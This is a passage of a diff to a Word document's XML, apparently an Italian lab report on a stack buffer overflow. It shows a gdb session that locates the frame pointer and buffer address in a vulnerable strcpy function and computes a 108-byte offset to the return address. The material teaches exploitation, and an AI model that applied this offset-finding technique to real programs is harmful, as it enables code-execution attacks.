@@ -7000,22 +7327,29 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">$ touch </w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>badfile</w:t>
+              <w:t>gdb</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t>) b foo</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7024,19 +7358,47 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">$ </w:t>
+              <w:t xml:space="preserve">Breakpoint 1 at 0x804848a: file </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
+              <w:t>stack.c</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, line 14. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
               <w:t>gdb</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
@@ -7044,21 +7406,56 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">) run </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">...... </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">Breakpoint 1, foo (str=0xbfffeb1c "...") at stack.c:10 </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">10 </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>stack_dbg</w:t>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>strcpy</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>buffer, str);</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7067,6 +7464,8 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="3"/>
@@ -7074,7 +7473,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-      </w:pPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7083,7 +7483,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:br/>
+        <w:t xml:space="preserve">A questo punto </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7093,7 +7493,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>Una volta eseguita la m</w:t>
+        <w:t>si p</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7103,72 +7503,62 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve">odalità debugging, si va ad aggiungere un </w:t>
+        <w:t xml:space="preserve">uò andare ad individuare il valore del frame pointer </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t>breakpoint</w:t>
+        <w:t>ebp</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
           <w:kern w:val="3"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> alla funzione </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">e l’indirizzo del buffer andando ad utilizzare il comando </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> di </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>foo</w:t>
+        <w:t>gdb</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e si esegue il programma. Come si potrà vedere dall’output della shell di comando, il programma si arresta alla funzione </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>foo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -7208,29 +7598,36 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>) p $</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>ebp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>) b foo</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7239,6 +7636,126 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$1 = (void *) 0xbfffeaf8 </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) p &amp;buffer </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>$2 = (char (</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>*)[</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">100]) 0xbfffea8c </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>gdb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">) p/d 0xbfffeaf8 - 0xbfffea8c </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
@@ -7246,97 +7763,21 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">Breakpoint 1 at 0x804848a: file </w:t>
+              <w:t>$3 = 108 (</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>stack.c</w:t>
+              <w:t>gdb</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">, line 14. </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>gdb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) run </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">...... </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">Breakpoint 1, foo (str=0xbfffeb1c "...") at stack.c:10 </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">10 </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>strcpy</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>buffer, str);</w:t>
+              <w:t>) quit</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7345,49 +7786,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A questo punto </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>si p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">uò andare ad individuare il valore del frame pointer </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -7396,51 +7794,240 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Da</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i risultati riportati qui sopra, si può vedere che il valore del frame pointer è </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>0xbfffeaf8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e l’indirizzo del buffer è </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>0xbfffea8c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Andando a calcolare la distanza tra questi due valori si ottiene 108, e dato che il campo per il </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> è 4 bytes avanti rispetto l’</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
         <w:t>ebp</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
